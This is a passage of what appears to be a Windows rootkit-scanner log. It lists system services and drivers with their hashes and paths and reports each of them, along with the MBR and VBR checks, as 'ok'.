15:33:50.0592 0x04bc  [ EDBB23CBCF2CDF727D64FF9B51A6070E, 7202484C8E1BFB2AFD64D8C81668F3EDE0E3BF5EB27572877A0A7B337AE5AE42 ] UxSms           C:\Windows\System32\uxsms.dll
15:33:50.0628 0x04bc  UxSms - ok
15:33:50.0655 0x04bc  [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] VaultSvc        C:\Windows\system32\lsass.exe
15:33:50.0663 0x04bc  VaultSvc - ok
15:33:50.0673 0x04bc  [ C5C876CCFC083FF3B128F933823E87BD, 6FE0FBB6C3207E09300E0789E2168F76668D87C317FE9F263E733827ADCFBE0D ] vdrvroot        C:\Windows\system32\drivers\vdrvroot.sys
15:33:50.0681 0x04bc  vdrvroot - ok
15:33:50.0714 0x04bc  [ 8D6B481601D01A456E75C3210F1830BE, A2CEF483F4231367138EEF7E67FD5BE5364FC0780C44CA1368E36CE4AA3D0633 ] vds             C:\Windows\System32\vds.exe
15:33:50.0743 0x04bc  vds - ok
15:33:50.0765 0x04bc  [ DA4DA3F5E02943C2DC8C6ED875DE68DD, EDE604536DB78C512D68C92B26DA77C8811AC109D1F0A473673F0A82D15A2838 ] vga             C:\Windows\system32\DRIVERS\vgapnp.sys
15:33:50.0776 0x04bc  vga - ok
15:33:50.0794 0x04bc  [ 53E92A310193CB3C03BEA963DE7D9CFC, 45898604375B42EB1246C17A22D91C2440F11C746FF6459AD38027C1BC2E3125 ] VgaSave         C:\Windows\System32\drivers\vga.sys
15:33:50.0825 0x04bc  VgaSave - ok
15:33:50.0845 0x04bc  [ 2CE2DF28C83AEAF30084E1B1EB253CBB, D1946816A1CB89F825CBEA58F94A4C9D0CE7249355CD3915563F54054EE564BF ] vhdmp           C:\Windows\system32\drivers\vhdmp.sys
15:33:50.0855 0x04bc  vhdmp - ok
15:33:50.0890 0x04bc  [ E5689D93FFE4E5D66C0178761240DD54, 6D35CED80681B12AAF63BFA0DA1C386E71D3838839B68A686990AA8031949D27 ] viaide          C:\Windows\system32\drivers\viaide.sys
15:33:50.0898 0x04bc  viaide - ok
15:33:50.0903 0x04bc  [ 86EA3E79AE350FEA5331A1303054005F, 7E7D6027EB41E591633C7383A5D29A3BA8ECFC08C177D2BCF741EE27686B1691 ] vmbus           C:\Windows\system32\drivers\vmbus.sys
15:33:50.0913 0x04bc  vmbus - ok
15:33:50.0916 0x04bc  [ 7DE90B48F210D29649380545DB45A187, 09522F84285D62B961868DA98C40B82E746CA4D24A9780905673A2349D6B07F4 ] VMBusHID        C:\Windows\system32\drivers\VMBusHID.sys
15:33:50.0937 0x04bc  VMBusHID - ok
15:33:50.0964 0x04bc  [ D2AAFD421940F640B407AEFAAEBD91B0, 31EF342A60AF04F4108759A71F8FB7B8C8819216CF3D16A95B2BA0E33A8A9161 ] volmgr          C:\Windows\system32\drivers\volmgr.sys
15:33:50.0972 0x04bc  volmgr - ok
15:33:50.0984 0x04bc  [ A255814907C89BE58B79EF2F189B843B, 463DB771851352185B6AC323BD93B9084D47291E53C1F7B628B65D6918B2E28F ] volmgrx         C:\Windows\system32\drivers\volmgrx.sys
15:33:50.0997 0x04bc  volmgrx - ok
15:33:51.0026 0x04bc  [ DF83AA1C4278E2C0E36C0479C1555A9C, EA082BE4E38E22FD0C7D0A98DC227E2E33C0D87964D87276A2F56044656CD6F0 ] volsnap         C:\Windows\system32\drivers\volsnap.sys
15:33:51.0038 0x04bc  volsnap - ok
15:33:51.0042 0x04bc  [ 5E2016EA6EBACA03C04FEAC5F330D997, 53106EB877459FE55A459111F7AB0EE320BB3B4C954D3DB6FA1642396001F2AC ] vsmraid         C:\Windows\system32\drivers\vsmraid.sys
15:33:51.0052 0x04bc  vsmraid - ok
15:33:51.0102 0x04bc  [ B60BA0BC31B0CB414593E169F6F21CC2, 47B801E623254CF0202B3591CB5C019CABFB52F123C7D47E29D19B32F1F2B915 ] VSS             C:\Windows\system32\vssvc.exe
15:33:51.0158 0x04bc  VSS - ok
15:33:51.0171 0x04bc  [ 36D4720B72B5C5D9CB2B9C29E9DF67A1, 3254523C85C70EBA2DBAC05DB2DBA89EDF8E9195F390F7C21F96458FB6B2E3D7 ] vwifibus        C:\Windows\System32\drivers\vwifibus.sys
15:33:51.0199 0x04bc  vwifibus - ok
15:33:51.0218 0x04bc  [ 1C9D80CC3849B3788048078C26486E1A, 34A89F31E53F6B6C209B286F580CC2257AE6D057E4E20741F241C9C167947962 ] W32Time         C:\Windows\system32\w32time.dll
15:33:51.0245 0x04bc  W32Time - ok
15:33:51.0279 0x04bc  [ 4E9440F4F152A7B944CB1663D3935A3E, 8FE04EBD3BC612EE943A21A3E56F37E5C9B578CDACA6044048181DAD81816D53 ] WacomPen        C:\Windows\system32\drivers\wacompen.sys
15:33:51.0297 0x04bc  WacomPen - ok
15:33:51.0314 0x04bc  [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] WANARP          C:\Windows\system32\DRIVERS\wanarp.sys
15:33:51.0343 0x04bc  WANARP - ok
15:33:51.0346 0x04bc  [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] Wanarpv6        C:\Windows\system32\DRIVERS\wanarp.sys
15:33:51.0367 0x04bc  Wanarpv6 - ok
15:33:51.0408 0x04bc  [ 3CEC96DE223E49EAAE3651FCF8FAEA6C, 4150DAB33E8D61076F1D4767BCAFC9B4ECCCCBD58FD4FB3CFE5B8D27DCDCAB61 ] WatAdminSvc     C:\Windows\system32\Wat\WatAdminSvc.exe
15:33:51.0433 0x04bc  WatAdminSvc - ok
15:33:51.0476 0x04bc  [ 78F4E7F5C56CB9716238EB57DA4B6A75, 46A4E78CE5F2A4B26F4E9C3FF04A99D9B727A82AC2E390A82A1611C3F6E0C9AF ] wbengine        C:\Windows\system32\wbengine.exe
15:33:51.0537 0x04bc  wbengine - ok
15:33:51.0550 0x04bc  [ 3AA101E8EDAB2DB4131333F4325C76A3, 4F7BD3DA5E58B18BFF106CFF7B45E75FD13EE556D433C695BA23EC80827E49DE ] WbioSrvc        C:\Windows\System32\wbiosrvc.dll
15:33:51.0565 0x04bc  WbioSrvc - ok
15:33:51.0587 0x04bc  [ 7368A2AFD46E5A4481D1DE9D14848EDD, 8039C478FC2D9F095F5883A4FA47F9E6EDF57CC88A4AA74F07C88445F90DED57 ] wcncsvc         C:\Windows\System32\wcncsvc.dll
15:33:51.0617 0x04bc  wcncsvc - ok
15:33:51.0641 0x04bc  [ 20F7441334B18CEE52027661DF4A6129, 7B8E0247234B740FED2BE9B833E9CE8DD7453340123AB43F6B495A7E6A27B0DD ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
15:33:51.0656 0x04bc  WcsPlugInService - ok
15:33:51.0677 0x04bc  [ 72889E16FF12BA0F235467D6091B17DC, F2FD0BBD075E33608D93F350D216F97442AB89ABD540513C2D568C78096E12A8 ] Wd              C:\Windows\system32\drivers\wd.sys
15:33:51.0684 0x04bc  Wd - ok
15:33:51.0714 0x04bc  [ E2C933EDBC389386EBE6D2BA953F43D8, AF1DEADD5F1267CCEBD226E8EEB971D1946EA6A5A9645A36F5D111F758AF2F07 ] Wdf01000        C:\Windows\system32\drivers\Wdf01000.sys
15:33:51.0735 0x04bc  Wdf01000 - ok
15:33:51.0759 0x04bc  [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiServiceHost  C:\Windows\system32\wdi.dll
15:33:51.0830 0x04bc  WdiServiceHost - ok
15:33:51.0834 0x04bc  [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiSystemHost   C:\Windows\system32\wdi.dll
15:33:51.0846 0x04bc  WdiSystemHost - ok
15:33:51.0874 0x04bc  [ 1BABAABCB29B03CFA7BC30833963398E, A354415572EEEB6FD7847F0FAF07BB7772E761EA485CFF3FE7837706515E85A0 ] WebClient       C:\Windows\System32\webclnt.dll
15:33:51.0888 0x04bc  WebClient - ok
15:33:51.0905 0x04bc  [ D5BA7D43FA2EF656BF7E98A188391E40, 56CF132B7C43A0F9C7C4D070730315FE7AFD2E87E94014DFC3D7107BB52B9C64 ] Wecsvc          C:\Windows\system32\wecsvc.dll
15:33:51.0938 0x04bc  Wecsvc - ok
15:33:51.0958 0x04bc  [ 7E591867422DC788B9E5BD337A669A08, 484E6BCCDF7ADCE9A1AACAD1BC7C7D7694B9E40FA90D94B14D80C607784F6C75 ] wercplsupport   C:\Windows\System32\wercplsupport.dll
15:33:51.0982 0x04bc  wercplsupport - ok
15:33:52.0016 0x04bc  [ 6D137963730144698CBD10F202E9F251, A9F522A125158D94F540544CCD4DBF47B9DCE2EA878C33675AFE40F80E8F4979 ] WerSvc          C:\Windows\System32\WerSvc.dll
15:33:52.0040 0x04bc  WerSvc - ok
15:33:52.0053 0x04bc  [ 611B23304BF067451A9FDEE01FBDD725, 0AF2734B978165FC6FD22B64862132CCE32528A21C698A49D176129446E099C8 ] WfpLwf          C:\Windows\system32\DRIVERS\wfplwf.sys
15:33:52.0074 0x04bc  WfpLwf - ok
15:33:52.0092 0x04bc  [ 05ECAEC3E4529A7153B3136CEB49F0EC, 9995CB2CEC70A633EA33CBB0DEAD2BB28CB67132B41E9444BDAB9E75744C9A50 ] WIMMount        C:\Windows\system32\drivers\wimmount.sys
15:33:52.0100 0x04bc  WIMMount - ok
15:33:52.0112 0x04bc  WinDefend - ok
15:33:52.0115 0x04bc  WinHttpAutoProxySvc - ok
15:33:52.0155 0x04bc  [ 136760C1E9697BAF4ECDEAE5590A0806, 12E80D0923D794F4C520FEA7CB98EF581231B996FB1876EB20995E6E457EFF56 ] Winmgmt         C:\Windows\system32\wbem\WMIsvc.dll
15:33:52.0183 0x04bc  Winmgmt - ok
15:33:52.0255 0x04bc  [ 3BB6B401A780BF434C8F58137DE10BF7, 1A377C39B78B92A1A1FED699EE5E5ED0271A6FFAC143F1D29FC1FDF4D726A522 ] WinRM           C:\Windows\system32\WsmSvc.dll
15:33:52.0336 0x04bc  WinRM - ok
15:33:52.0370 0x04bc  [ FE88B288356E7B47B74B13372ADD906D, A16B166F6BB32EF9D2A142F27B9EC54CBC7B3AC915799783CF4C40E525BC9E03 ] WinUsb          C:\Windows\system32\drivers\WinUSB.sys
15:33:52.0391 0x04bc  WinUsb - ok
15:33:52.0551 0x04bc  [ 4FADA86E62F18A1B2F42BA18AE24E6AA, CE1683386886BF34862681A46199EA7E7FB4232A186047DA7FBD8EC240AF6726 ] Wlansvc         C:\Windows\System32\wlansvc.dll
15:33:52.0606 0x04bc  Wlansvc - ok
15:33:52.0664 0x04bc  [ F6FF8944478594D0E414D3F048F0D778, 6F75E0AE6127B33A92A88E59D4B048FD4C15F997807BE7BF0EFE76F95235B1D9 ] WmiAcpi         C:\Windows\system32\drivers\wmiacpi.sys
15:33:52.0674 0x04bc  WmiAcpi - ok
15:33:52.0719 0x04bc  [ 4DF841632B62A7CF19A79A05046A8AB1, D80F28FD7FEB95DB83976EAFECB2E9AE1423DA4D34EC5D820FC39A33444B82DA ] wmiApSrv        C:\Windows\system32\wbem\WmiApSrv.exe
15:33:52.0730 0x04bc  wmiApSrv - ok
15:33:52.0764 0x04bc  WMPNetworkSvc - ok
15:33:53.0105 0x04bc  [ D0C5F1B0144C02E6695DB09E3A627684, 5B9318613BD49CF6167F2B013C8352E3FF1065816EDD928BD116911B852AD15F ] workfolderssvc  C:\Windows\system32\workfolderssvc.dll
15:33:53.0226 0x04bc  workfolderssvc - ok
15:33:53.0328 0x04bc  [ 96C6E7100D724C69FCF9E7BF590D1DCA, 2E63C9B0893B4FC03B7A71BAEA6202D3D3DB1B52F3643467829B5A573FD7655B ] WPCSvc          C:\Windows\System32\wpcsvc.dll
15:33:53.0357 0x04bc  WPCSvc - ok
15:33:53.0374 0x04bc  [ 93221146D4EBBF314C29B23CD6CC391D, C0750858A65BF51E210CD244C825C121D67E025CD2D2455139991AAC289A90FE ] WPDBusEnum      C:\Windows\system32\wpdbusenum.dll
15:33:53.0447 0x04bc  WPDBusEnum - ok
15:33:53.0479 0x04bc  [ 6BCC1D7D2FD2453957C5479A32364E52, E48554D31FBDCF8F985C1C72524CAA9106F5B7CC2B79064F8F5E2562D517F090 ] ws2ifsl         C:\Windows\system32\drivers\ws2ifsl.sys
15:33:53.0520 0x04bc  ws2ifsl - ok
15:33:53.0555 0x04bc  [ E8B1FE6669397D1772D8196DF0E57A9E, 39FE0819360719F756BD31A1884A0508A1E2371ACC723E25E005CBEC0A7B02FA ] wscsvc          C:\Windows\System32\wscsvc.dll
15:33:53.0579 0x04bc  wscsvc - ok
15:33:53.0581 0x04bc  WSearch - ok
15:33:53.0887 0x04bc  [ D9EF901DCA379CFE914E9FA13B73B4C4, 3BE9693B7B2AFEE23D72AF5DA211379724D752F0EC18ACB7D3DE3DDFC5AE0004 ] wuauserv        C:\Windows\system32\wuaueng.dll
15:33:53.0929 0x04bc  wuauserv - ok
15:33:53.0949 0x04bc  [ AB886378EEB55C6C75B4F2D14B6C869F, D6C4602EB8F291DADEDF3CD211013D4AC752DDE7E799C2D8D74AA4F5477CAED6 ] WudfPf          C:\Windows\system32\drivers\WudfPf.sys
15:33:53.0982 0x04bc  WudfPf - ok
15:33:54.0011 0x04bc  [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFRd          C:\Windows\system32\DRIVERS\WUDFRd.sys
15:33:54.0048 0x04bc  WUDFRd - ok
15:33:54.0064 0x04bc  [ B20F051B03A966392364C83F009F7D17, 88ECEB55AE91F58F592B96EBC10B572747D5A2F9B7629E8F371761E4F7408A65 ] wudfsvc         C:\Windows\System32\WUDFSvc.dll
15:33:54.0093 0x04bc  wudfsvc - ok
15:33:54.0116 0x04bc  [ 04F82965C09CBDF646B487E145060301, 2CD8533EDBE24C3E42EB7550E20F8A2EB9E5E345B165DEF543163A6BC1FDD18B ] WwanSvc         C:\Windows\System32\wwansvc.dll
15:33:54.0159 0x04bc  WwanSvc - ok


15:33:54.0169 0x04bc  ================ Scan global ===============================
15:33:54.0199 0x04bc  [ BA0CD8C393E8C9F83354106093832C7B, 18D8A4780A2BAA6CEF7FBBBDA0EF6BF2DADF146E1E578A618DD5859E8ADBF1A8 ] C:\Windows\system32\basesrv.dll
15:33:54.0285 0x04bc  [ 88EDD0B34EED542745931E581AD21A32, DC2B93E1CEF5B0BCEE08D72669BB0F3AD0E8E6E75BDC08858407ED92F6FFA031 ] C:\Windows\system32\winsrv.dll
15:33:54.0293 0x04bc  [ 88EDD0B34EED542745931E581AD21A32, DC2B93E1CEF5B0BCEE08D72669BB0F3AD0E8E6E75BDC08858407ED92F6FFA031 ] C:\Windows\system32\winsrv.dll
15:33:54.0338 0x04bc  [ D6160F9D869BA3AF0B787F971DB56368, 0033E6212DD8683E4EE611B290931FDB227B4795F0B17C309DC686C696790529 ] C:\Windows\system32\sxssrv.dll
15:33:54.0385 0x04bc  [ 24ACB7E5BE595468E3B9AA488B9B4FCB, 63541E3432FCE953F266AE553E7A394978D6EE3DB52388D885F668CF42C5E7E2 ] C:\Windows\system32\services.exe
15:33:54.0389 0x04bc  [ Global ] - ok
15:33:54.0390 0x04bc  ================ Scan MBR ==================================
15:33:54.0426 0x04bc  [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
15:33:58.0693 0x04bc  \Device\Harddisk0\DR0 - ok
15:33:58.0693 0x04bc  ================ Scan VBR ==================================
15:33:58.0714 0x04bc  [ 1578F8FFABBAD4A503F642FC33B0601D ] \Device\Harddisk0\DR0\Partition1
15:33:58.0733 0x04bc  \Device\Harddisk0\DR0\Partition1 - ok
15:33:58.0733 0x04bc  ================ Scan active images ========================
15:33:58.0734 0x04bc  [ 3E588B60EC061686BA05D33574A344C6, 19D2D863F95CCC4493A2328B6BEB04248B6A80F957532E58C1D1D868C19FDCCB ] C:\Windows\System32\drivers\crashdmp.sys
15:33:58.0734 0x04bc  C:\Windows\System32\drivers\crashdmp.sys - ok
15:33:58.0736 0x04bc  [ 814DB88F2641691575A455CF25354098, 79C50F0CD72612733217A0316BEFEA0B6D819C3159D9452EAB89AC26A18A0F89 ] C:\Windows\System32\drivers\dumpfve.sys
15:33:58.0736 0x04bc  C:\Windows\System32\drivers\dumpfve.sys - ok
15:33:58.0738 0x04bc  [ C224331A54571C8C9162F7714400BBBD, C2CA4881ACD46071E67435BE5E3DB133D0743B026FD20D6D6E26B2FE7A03FCAA ] C:\Windows\System32\drivers\iaStor.sys
15:33:58.0738 0x04bc  C:\Windows\System32\drivers\iaStor.sys - ok
15:33:58.0740 0x04bc  [ F036CE71586E93D94DAB220D7BDF4416, BD07AAD9E20CEAF9FC84E4977C55EA2C45604A2C682AC70B9B9A2199B6713D5B ] C:\Windows\System32\drivers\cdrom.sys
15:33:58.0740 0x04bc  C:\Windows\System32\drivers\cdrom.sys - ok
15:33:58.0742 0x04bc  [ 0C2CF42167BC0B8C76D713F0BB36A6F7, B26D0141F7D5AC881DA9708B88CCA94532EF7C912A6172F09721CA4E8D125651 ] C:\Windows\System32\drivers\SEP\0C011010\103C.105\x64\ccSetx64.sys
15:33:58.0742 0x04bc  C:\Windows\System32\drivers\SEP\0C011010\103C.105\x64\ccSetx64.sys - ok
15:33:58.0744 0x04bc  [ DB963A41F5BEED627CCC88DBA05D18EE, 2E52734F35BA47D467B0E64F97E1A87D2756A03C70B485756C3D16C43C2E5A75 ] C:\Windows\System32\drivers\SEP\0C011010\103C.105\x64\srtsp64.sys
15:33:58.0744 0x04bc  C:\Windows\System32\drivers\SEP\0C011010\103C.105\x64\srtsp64.sys - ok
15:33:58.0745 0x04bc  [ B18CE01B9C09C59422BA7C7064248B35, B355EE2FBB37C4B0EFFE4DC5E0788A26579266828E7988EDC497B0AE7375F8AB ] C:\Windows\System32\drivers\SEP\0C011010\103C.105\x64\srtspx64.sys
15:33:58.0746 0x04bc  C:\Windows\System32\drivers\SEP\0C011010\103C.105\x64\srtspx64.sys - ok
15:33:58.0748 0x04bc  [ 7C30E8FB9076ED600C1EFD0FBBBE22C7, D91630238D0588D73147F3E98353341AB5E0BFB92BB4AABB6AC5499AFD5A48E9 ] C:\Windows\System32\drivers\SEP\0C011010\103C.105\x64\Ironx64.sys
15:33:58.0748 0x04bc  C:\Windows\System32\drivers\SEP\0C011010\103C.105\x64\Ironx64.sys - ok
15:33:58.0750 0x04bc  [ 97E11C50CE52277B377396EA8838E539, E17D03F80E14F961C41F2D54D1EF73D29BF01F38459C5710D786234F8BA3C835 ] C:\Windows\System32\drivers\SYMEVENT64x86.SYS
15:33:58.0750 0x04bc  C:\Windows\System32\drivers\SYMEVENT64x86.SYS - ok
15:33:58.0752 0x04bc  [ E66CA6C321614D7BC0AFC9C8436131B9, BF732419D56E1B8AB3B11B19403087D4EDBF9108F0252ACBB561235040AB4436 ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20141106.004\ex64.sys
15:33:58.0752 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20141106.004\ex64.sys - ok
15:33:58.0754 0x04bc  [ C180A82874D3CDC390A27F2F1E1AF025, 9F473661524D645D5C1D616BF2BEC2996DFAE9268B7CF280FCCBD19AA072E567 ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20141106.004\eng64.sys
15:33:58.0754 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20141106.004\eng64.sys - ok
15:33:58.0756 0x04bc  [ 16A47CE2DECC9B099349A5F840654746, 77C008AEDB07FAC66413841D65C952DDB56FE7DCA5E9EF9C8F4130336B838024 ] C:\Windows\System32\drivers\beep.sys
15:33:58.0756 0x04bc  C:\Windows\System32\drivers\beep.sys - ok
15:33:58.0757 0x04bc  [ 3CA2D9D44B0D060E34517208AE458CA1, 4725FDED592D60FECF9E52282ADA0B694BD763C186A2FA98ADB170CD55799A2B ] C:\Windows\System32\drivers\ctxusbm.sys
15:33:58.0757 0x04bc  C:\Windows\System32\drivers\ctxusbm.sys - ok
15:33:58.0759 0x04bc  [ 9899284589F75FA8724FF3D16AED75C1, 181188599FD5D4DE33B97010D9E0CAEABAB9A3EF50712FE7F9AA0735CD0666D6 ] C:\Windows\System32\drivers\null.sys
15:33:58.0759 0x04bc  C:\Windows\System32\drivers\null.sys - ok
15:33:58.0761 0x04bc  [ 53E92A310193CB3C03BEA963DE7D9CFC, 45898604375B42EB1246C17A22D91C2440F11C746FF6459AD38027C1BC2E3125 ] C:\Windows\System32\drivers\vga.sys
15:33:58.0761 0x04bc  C:\Windows\System32\drivers\vga.sys - ok
15:33:58.0763 0x04bc  [ E7353D59C9842BC7299FAEB7E7E09340, C37ED1025E07BAC2F535DCFED6C6C509515D95722EADE5AF94F1FC5D8B1DC783 ] C:\Windows\System32\drivers\videoprt.sys
15:33:58.0763 0x04bc  C:\Windows\System32\drivers\videoprt.sys - ok
15:33:58.0765 0x04bc  [ FC438D1430B28618E2D0C7C332A710AD, 873957B202E454E2C8F625E5799F278CAC16EC5EEAEE2C33E2FE5D1FF0408CB2 ] C:\Windows\System32\drivers\watchdog.sys
15:33:58.0765 0x04bc  C:\Windows\System32\drivers\watchdog.sys - ok
15:33:58.0767 0x04bc  [ CEA6CC257FC9B7715F1C2B4849286D24, A78144D18352EA802C39D9D42921CF97A3E0211766B2169B6755C6FC2D77A804 ] C:\Windows\System32\drivers\RDPCDD.sys
15:33:58.0767 0x04bc  C:\Windows\System32\drivers\RDPCDD.sys - ok
15:33:58.0769 0x04bc  [ BB5971A4F00659529A5C44831AF22365, 9AAA5C0D448E821FD85589505D99DF7749715A046BBD211F139E4E652ADDE41F ] C:\Windows\System32\drivers\RDPENCDD.sys
15:33:58.0769 0x04bc  C:\Windows\System32\drivers\RDPENCDD.sys - ok
15:33:58.0771 0x04bc  [ 216F3FA57533D98E1F74DED70113177A, 60C126A1409D1E9C39F1C9E95F70115BF4AF07780AB499F6E10A612540F173F4 ] C:\Windows\System32\drivers\RDPREFMP.sys
15:33:58.0771 0x04bc  C:\Windows\System32\drivers\RDPREFMP.sys - ok
15:33:58.0772 0x04bc  [ AA3FB40E17CE1388FA1BEDAB50EA8F96, 69F93E15536644C8FD679A20190CFE577F4985D3B1B4A4AA250A168615AE1E99 ] C:\Windows\System32\drivers\msfs.sys
15:33:58.0772 0x04bc  C:\Windows\System32\drivers\msfs.sys - ok
15:33:58.0774 0x04bc  [ 1E4C4AB5C9B8DD13179BBDC75A2A01F7, D8957EF7060A69DBB3CD6B2C45B1E4143592AB8D018471E17AC04668157DC67F ] C:\Windows\System32\drivers\npfs.sys
15:33:58.0774 0x04bc  C:\Windows\System32\drivers\npfs.sys - ok
15:33:58.0776 0x04bc  [ 6F020A220388ECA0AB6062DC27BD16B6, 48655230E482DEB7B4B50EF05818EBB29CA61E780AEFCD9D31B02DE4DF9D9540 ] C:\Windows\System32\drivers\tdi.sys
15:33:58.0776 0x04bc  C:\Windows\System32\drivers\tdi.sys - ok
15:33:58.0778 0x04bc  [ DDAD5A7AB24D8B65F8D724F5C20FD806, B71F2967A4EE7395E4416C1526CB85368AEA988BDD1F2C9719C48B08FAFA9661 ] C:\Windows\System32\drivers\tdx.sys
15:33:58.0778 0x04bc  C:\Windows\System32\drivers\tdx.sys - ok
15:33:58.0780 0x04bc  [ BDF76C3CE993FFB6214287272708364F, C2112D58104DD8FB74530F6DCA4F1261C82F26DE928E0BD764BCB6EF49B59A2D ] C:\Windows\System32\drivers\afd.sys
15:33:58.0780 0x04bc  C:\Windows\System32\drivers\afd.sys - ok
15:33:58.0782 0x04bc  [ 09594D1089C523423B32A4229263F068, 7426A9B8BA27D3225928DDEFBD399650ABB90798212F56B7D12158AC22CCCE37 ] C:\Windows\System32\drivers\netbt.sys
15:33:58.0782 0x04bc  C:\Windows\System32\drivers\netbt.sys - ok
15:33:58.0784 0x04bc  [ 0557CF5A2556BD58E26384169D72438D, F6F83A616B1F1C6C0DF6D2EC2513E6C23FD4FAA6D36518B8676C619AB74957B4 ] C:\Windows\System32\drivers\pacer.sys
15:33:58.0784 0x04bc  C:\Windows\System32\drivers\pacer.sys - ok
15:33:58.0785 0x04bc  [ 611B23304BF067451A9FDEE01FBDD725, 0AF2734B978165FC6FD22B64862132CCE32528A21C698A49D176129446E099C8 ] C:\Windows\System32\drivers\wfplwf.sys
15:33:58.0785 0x04bc  C:\Windows\System32\drivers\wfplwf.sys - ok
15:33:58.0787 0x04bc  [ 316F40535360C97A0419F8A8AE4A9A80, CB9F0BAD3B321C27E934BE4AE8065A36701276435F03212350BAF6FD55989858 ] C:\Windows\System32\drivers\Teefer.sys
15:33:58.0787 0x04bc  C:\Windows\System32\drivers\Teefer.sys - ok
15:33:58.0789 0x04bc  [ 86743D9F5D2B1048062B14B1D84501C4, DBF6D6A60AB774FCB0F464FF2D285A7521D0A24006687B243AB46B17D8032062 ] C:\Windows\System32\drivers\netbios.sys
15:33:58.0789 0x04bc  C:\Windows\System32\drivers\netbios.sys - ok
15:33:58.0791 0x04bc  [ C1D8E28B2C2ADFAEC4BA89E9FDA69BD6, 8F9776FB84C5D11068EAF1FF1D1A46466C655D64D256A8B1E31DC0C23B5DD22D ] C:\Windows\System32\drivers\serial.sys
15:33:58.0791 0x04bc  C:\Windows\System32\drivers\serial.sys - ok
15:33:58.0793 0x04bc  [ 561E7E1F06895D78DE991E01DD0FB6E5, 83BFA50A528762EC52A011302AC3874636FB7E26628CD7ACFBF2BDC9FAA8110D ] C:\Windows\System32\drivers\termdd.sys
15:33:58.0793 0x04bc  C:\Windows\System32\drivers\termdd.sys - ok
15:33:58.0795 0x04bc  [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] C:\Windows\System32\drivers\wanarp.sys
15:33:58.0795 0x04bc  C:\Windows\System32\drivers\wanarp.sys - ok
15:33:58.0796 0x04bc  [ 5C4FD41D8017801B11F212B27AC72D16, F8FB8A64A2FF27F9E2608ACB149675666CFB4EAC8C3582568B44931C3AE9635C ] C:\Windows\System32\drivers\SysPlant.sys
15:33:58.0797 0x04bc  C:\Windows\System32\drivers\SysPlant.sys - ok
15:33:58.0799 0x04bc  [ 191264EBF602F02ECE77B18D68046CF7, ABB05486E690C1C86D715972CAEDAAED9EEEEC09E47FEFA107C0B808FBDFD117 ] C:\Windows\System32\drivers\SEP\0C011010\103C.105\x64\symnets.sys
15:33:58.0799 0x04bc  C:\Windows\System32\drivers\SEP\0C011010\103C.105\x64\symnets.sys - ok
15:33:58.0801 0x04bc  [ 90F489A0A6BC302AEDCEDABFBC7952F8, 46E5065811A584209E84F2E39606EA9A355CF178BCD4D6CFFA83C2B45D740559 ] C:\Windows\System32\drivers\rdbss.sys
15:33:58.0801 0x04bc  C:\Windows\System32\drivers\rdbss.sys - ok
15:33:58.0803 0x04bc  [ 0EED230E37515A0EAEE3C2E1BC97B288, B1D8F8A75006B6E99214CA36D27A8594EF8D952F315BEB201E9BAC9DE3E64D42 ] C:\Windows\System32\drivers\mssmbios.sys
15:33:58.0803 0x04bc  C:\Windows\System32\drivers\mssmbios.sys - ok
15:33:58.0804 0x04bc  [ E7F5AE18AF4168178A642A9247C63001, 133023B7E4BA8049C4CAED3282BDD25571D1CC25FAC3B820C7F981D292689D76 ] C:\Windows\System32\drivers\nsiproxy.sys
15:33:58.0804 0x04bc  C:\Windows\System32\drivers\nsiproxy.sys - ok
15:33:58.0806 0x04bc  [ 47D561365913893120FC651419745FDA, B1D61C40A2EA1CF2440FF8C154C085600B2E6B68F4376B4D33B5AC1E87D9181E ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20141105.011\IDSviA64.sys
15:33:58.0806 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20141105.011\IDSviA64.sys - ok
15:33:58.0809 0x04bc  [ 03E1B8BA59327D186C7C533A6998FEF9, 224937A697B55BD9CCD790771DBE9D135021AD1DC3E6D6AC7C431C56F0FFBBB5 ] C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys
15:33:58.0809 0x04bc  C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys - ok
15:33:58.0811 0x04bc  [ 142EA7DF1851C563571F2DCFC7AFBB40, 14DE008B68D127F246A64290DFCBD7ECDE8FF7932B3BAE660EB131860E826EAD ] C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys
15:33:58.0811 0x04bc  C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys - ok
15:33:58.0813 0x04bc  [ 13096B05847EC78F0977F2C0F79E9AB3, 1E44981B684F3E56F5D2439BB7FA78BD1BC876BB2265AE089AEC68F241B05B26 ] C:\Windows\System32\drivers\discache.sys
15:33:58.0813 0x04bc  C:\Windows\System32\drivers\discache.sys - ok
15:33:58.0815 0x04bc  [ 5B0D28D7072499817A56527670F5C4B3, 47BC116DA2FD228AFBBCC942458BDE02ACFBFD0F88CBB610160177448B162BD0 ] C:\Windows\System32\drivers\csc.sys
